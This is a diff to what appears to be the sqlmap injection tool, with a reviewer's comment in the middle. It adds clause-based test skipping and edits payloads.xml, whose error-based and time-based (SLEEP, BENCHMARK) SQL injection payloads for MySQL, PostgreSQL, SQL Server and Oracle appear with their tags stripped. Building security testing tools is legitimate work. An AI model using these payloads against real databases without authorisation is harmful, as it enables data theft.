diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 22a8589a7..462c16d78 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -94,6 +94,7 @@ def checkSqlInjection(place, parameter, value):
 for test in conf.tests:
 title = test.title
 stype = test.stype
+ clause = test.clause
 
 # Skip test if the risk is higher than the provided (or default)
 # value
@@ -145,6 +146,22 @@ def checkSqlInjection(place, parameter, value):
 logger.debug(debugMsg)
 continue
 
+ # Skip test if it does not match the same SQL injection clause
+ # already identified by another test
+ # Parse test's
+ clauseMatch = False
+
+ for clauseTest in clause:
+ if injection.clause is not None and clauseTest in injection.clause:
+ clauseMatch = True
+ break
+
+ if clause != [ 0 ] and injection.clause and not clauseMatch:
+ debugMsg = "skipping test '%s' because the clause " % title
+ debugMsg += "differs from the clause already identified"
+ logger.debug(debugMsg)
+ continue
+
 infoMsg = "testing '%s'" % title
 logger.info(infoMsg)
 
@@ -340,6 +357,7 @@ def checkSqlInjection(place, parameter, value):
 injection.ptype = ptype
 injection.prefix = prefix
 injection.suffix = suffix
+ injection.clause = clause
 
 if "epayload" in test:
 epayload = "%s%s" % (test.epayload, comment)
diff --git a/lib/core/datatype.py b/lib/core/datatype.py
index 101b6315f..97b748b43 100644
--- a/lib/core/datatype.py
+++ b/lib/core/datatype.py
@@ -70,6 +70,7 @@ def injectionDict():
 injection.ptype = None
 injection.prefix = None
 injection.suffix = None
+ injection.clause = None
 
 # data is a dict with stype as key and a tuple as value with
 # title, where, comment and reqPayload
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 749950b56..bb30133e9 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -393,16 +393,6 @@ Formats: - - - 2 - 2,3 - 1,2 - 1 - , - - -
@@ -604,16 +594,6 @@ Formats: -- - - - 2 - 2,3 - 1,2 - 1 - , - - -- - 
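Review bot: The clause guard in the second checks.py hunk is asymmetric: `clause != [ 0 ]` exempts a test whose own clause is the wildcard, but once an earlier finding has stored `[0]` in `injection.clause` (the assignment in the third hunk), no concrete clause value is `in [0]`, so every later test with a specific clause is skipped. If `0` means "any clause", as that guard implies, the stored wildcard should not suppress later tests either: `if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:`. The match loop can collapse to `clauseMatch = bool(injection.clause) and any(c in injection.clause for c in clause)`, which performs the `is not None` check once instead of per iteration. The dangling `# Parse test's` comment fragment should be completed or removed. checkSqlInjection starts and ends outside these hunks.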
@@ -662,10 +642,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))
MySQL @@ -682,10 +662,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL @@ -701,10 +681,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server @@ -720,10 +700,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)
Oracle
@@ -741,10 +721,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))
@@ -1046,15 +1026,15 @@ Formats: - MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses + MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses (append) 2 3 0 2,3 1 - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
@@ -1066,15 +1046,15 @@ Formats: - PostgreSQL error-based - GROUP BY and ORDER BY clauses + PostgreSQL error-based - GROUP BY and ORDER BY clauses (append) 2 3 0 2,3 1 - (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) + , (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) - (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) + , (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] 
@@ -1085,15 +1065,15 @@ Formats: - Microsoft SQL Server/Sybase error-based - ORDER BY clause + Microsoft SQL Server/Sybase error-based - ORDER BY clause (append) 2 3 0 3 1 - (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) + , (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) - (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) + , (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
@@ -1104,15 +1084,15 @@ Formats: - Oracle error-based - ORDER BY clause + Oracle error-based - ORDER BY clause (append) 2 3 0 3 1 - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
@@ -1123,7 +1103,7 @@ Formats: - MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses + MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses (replace) 2 4 0
@@ -1143,7 +1123,7 @@ Formats: - PostgreSQL error-based - GROUP BY and ORDER BY clauses + PostgreSQL error-based - GROUP BY and ORDER BY clauses (replace) 2 4 0
@@ -1162,7 +1142,7 @@ Formats: - Microsoft SQL Server/Sybase error-based - ORDER BY clause + Microsoft SQL Server/Sybase error-based - ORDER BY clause (replace) 2 4 0 
@@ -1181,7 +1161,7 @@ Formats: - Oracle error-based - ORDER BY clause + Oracle error-based - ORDER BY clause (replace) 2 4 0
@@ -1437,7 +1417,7 @@ Formats: 5 1 1 - 1 + 1,2,3 1 AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))
@@ -1457,7 +1437,7 @@ Formats: 5 2 1 - 1 + 1,2,3 1 AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))
@@ -1525,7 +1505,7 @@ Formats: 5 2 3 - 1 + 1,2,3 1 OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))
@@ -1545,7 +1525,7 @@ Formats: 5 3 3 - 1 + 1,2,3 1 OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))